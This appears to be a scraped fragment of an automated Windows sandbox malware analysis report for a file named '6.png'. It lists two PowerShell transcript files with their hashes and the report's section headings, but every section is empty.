C:\Users\user\Documents\20211214\PowerShell_transcript.841675.ZSxBE1Sk.20211214103425.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	E0C308808C66AB01D5B3EF7C3856B1D5	13F36AB3AAEA583989B9C72E15A29F8F49EC8B2A	EA41567677F8A22C46060C26ACB8AE2B68B789283782A6096F264A4DBF25468D
C:\Users\user\Documents\20211214\PowerShell_transcript.841675.g3ZPtttJ.20211214103418.txt	UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators	635442A47792E7CA6AB6C67E60181544	1476DE8E879BA1B92742F3F951AECE56DE2A882A	C9026B19F44A3E5A20EA9A2F355703C5BC988246CC98D0EE2228333766324050

Windows Analysis Report 6.png

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs